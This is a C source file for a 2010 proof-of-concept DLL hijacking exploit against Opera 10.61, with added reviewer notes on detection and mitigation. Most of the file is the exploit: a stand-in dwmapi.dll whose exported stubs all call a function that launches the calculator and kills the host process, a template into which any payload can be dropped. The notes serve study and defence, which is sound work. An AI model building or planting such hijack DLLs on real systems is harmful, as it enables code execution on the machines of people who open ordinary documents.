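/*
 * Exploit Title: Opera DLL Hijacking Exploit ( dwmapi.dll )
 * Date: 24/08/2010
 * Author: Nicolas Krassas
 * http://twitter.com/Dinosn
 * Version: Opera 10.61
 * Tested on: Windows XP SP3
 * The code is based on the exploit from "TheLeader"
 * Vulnerable extensions: .htm .mht .mhtml .xht .xhtm .xhtl
 * dwmapi.dll is used in other applications too
 */

/*
 * Reviewer notes (defensive context).
 *
 * Class: DLL search-order hijacking ("binary planting"). Per the title, the
 * affected application resolves dwmapi.dll by bare name; presumably the
 * search reaches the directory of the opened document, so a same-named DLL
 * stored beside a file of one of the listed types is loaded in place of a
 * system copy. The page does not show the loader side -- confirm against
 * the vendor advisory before relying on the details.
 *
 * What this listing contains: a proof-of-concept stand-in DLL whose exports
 * all funnel into evil(), which starts the calculator as a harmless marker
 * and then terminates the host process. Nothing is forwarded to a genuine
 * dwmapi.dll, so the host application exiting right after opening a
 * document is itself an observable symptom.
 *
 * Detection: image-load telemetry (e.g. Sysmon Event ID 7) showing
 * dwmapi.dll mapped from anywhere other than the Windows system directory,
 * in particular from download folders, removable media or network shares;
 * an unsigned dwmapi.dll; the application spawning an unexpected child.
 *
 * Mitigation (application side): load system libraries by fully qualified
 * path, or restrict the search with LoadLibraryEx and
 * LOAD_LIBRARY_SEARCH_SYSTEM32; call SetDllDirectory("") early to drop the
 * current directory from the search order.
 * Mitigation (host side): the CWDIllegalInDllSearch setting introduced with
 * Microsoft Security Advisory 2269637, and keeping the application patched.
 */

#include <stdlib.h>   /* exit() */
#include <windows.h>  /* WinExec() */

/* Despite its name, this macro marks a symbol as *exported* from the DLL. */
#define DLLIMPORT __declspec (dllexport)

/* Declared ahead of the stubs so none of them relies on an implicit declaration. */
int evil(void);

/*
 * One stub per export name the host may resolve from dwmapi.dll. The stubs
 * take no arguments and do not mirror the real prototypes; each one only
 * hands control to evil().
 */
DLLIMPORT void DwmDefWindowProc(void) { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow(void) { evil(); }
DLLIMPORT void DwmEnableComposition(void) { evil(); }
DLLIMPORT void DwmEnableMMCSS(void) { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea(void) { evil(); }
DLLIMPORT void DwmGetColorizationColor(void) { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo(void) { evil(); }
DLLIMPORT void DwmGetWindowAttribute(void) { evil(); }
DLLIMPORT void DwmIsCompositionEnabled(void) { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration(void) { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize(void) { evil(); }
DLLIMPORT void DwmRegisterThumbnail(void) { evil(); }
DLLIMPORT void DwmSetDxFrameDuration(void) { evil(); }
DLLIMPORT void DwmSetPresentParameters(void) { evil(); }
DLLIMPORT void DwmSetWindowAttribute(void) { evil(); }
DLLIMPORT void DwmUnregisterThumbnail(void) { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties(void) { evil(); }

/*
 * Proof-of-concept marker: launches "calc" and ends the host process.
 *
 * Returns: never returns in practice, because exit(0) terminates the
 * process; the trailing return only satisfies the declared int type.
 */
int evil(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0; /* unreachable */
}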